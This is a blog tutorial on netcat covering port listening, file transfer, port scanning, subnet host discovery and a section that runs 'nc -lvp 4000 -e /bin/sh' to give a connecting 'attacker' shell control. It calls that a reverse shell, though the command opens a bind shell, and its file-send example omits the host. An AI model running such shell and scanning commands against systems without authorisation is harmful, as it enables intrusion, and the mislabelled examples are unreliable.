Netcat - The TCP/IP Swiss Army Knife


This week I wanted to share some information about a very useful network tool.  Netcat, originally released in '95 is one extremely powerful little utility.  With a few simple key strokes one can scan ports on local/remote machine, connect to remote machine, send files over your local net, conduct host discovery and manage a machine remotely using reverse shell. 

People refer to Netcat as "The TCP/IP Swiss Army Knife."  A reason for this is that a lot of other network tools, or utilities you find in in distros like Kali have a very specific purpose (they do that "thing" and that is it).  Netcat is not like this and it is for this reason that being adept with this tool is imperative for any sysadmin/hacker.

Listening and Connecting:

Opening a port and have it listening can be very useful, also potentially dangerous if you forget about it.  An open port is an open port.

At this point anyone scanning your machine will be fed some information saying that your machine is open and ready to receive connections.
A quick port scan of this specific port will tell us some information about the port.  We will dive deeper into port scanning in a bit.

We can open a port set it to listening, lets connect to the listening port and send some messages between.

-l --> listening
-v --> verbose
-p --> port

listening machine -->  nc -lvp 4000 
connecting machine -->  nc <target ip> <port>

Sending a File:
It is possible to send files over your local network between machines.  It is also useful to know that you are not limited to text files.  You can send pictures and more.  Practice sending different files to fully understand the intricacies.

Make note that the receiving machine "listening" is intentionally putting the data into a specific holder "doc.received."  A tip, look at the direction of the ">". This symbol denotes the direction of the data.

nc -lvp 4000 > doc.received (data will be put into holder "doc.received")

nc 4000 < doc.sent (data currently in "doc.sent" is being sent to through port 4000

Port Scan:
Netcat can be used to quickly check ports on local and remote machines.  Here I am checking the same local machine I was connecting to before.  I have opened up 3 ports.  If there were other ports in use they would have been discovered as well.

-n --> no name resolution
-v --> verbose
-z --> I/O mode [used for scanning]
In the image you can see that I have selected a range of 1-200

You can also port scan websites.  Below I am scanning a popular port.  IP has been blacked out for obvious reasons.

Netcat will never replace other more popular port scanner (nmap etc.) however in a pinch Netcat can get the job done.

Reverse Shell:

How about gaining complete control of a remote machine?  Completely possible with Netcat. Lets take a look at the next couple images

Our target machine will have this command running on it's system

nc -lvp 4000 -e /bin/sh

"attacker" will connect to the target like so

nc <ip address> 4000

because the target machine is has a listening port open and is redirecting traffic to a shell the connecting machine will have complete control of the target.

As you can see in the window I was able to do an "ls" and show everything in the directory.

Host Discovery:

Last interesting thing to show you today.  We can use Netcat to probe the network and discover hosts.

for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done

Take a look at the above line, when we input it into a terminal it will start a for loop, conduct a port scan on port 443 for all IP addresses between  It is not incredibly fast, but if you find yourself in an environment without any gui, Netcat could be very helpful.

Thanks, I hope this helps.  I have included a link to a pdf for some more information on Netcat

Andrew Campbell

Popular Posts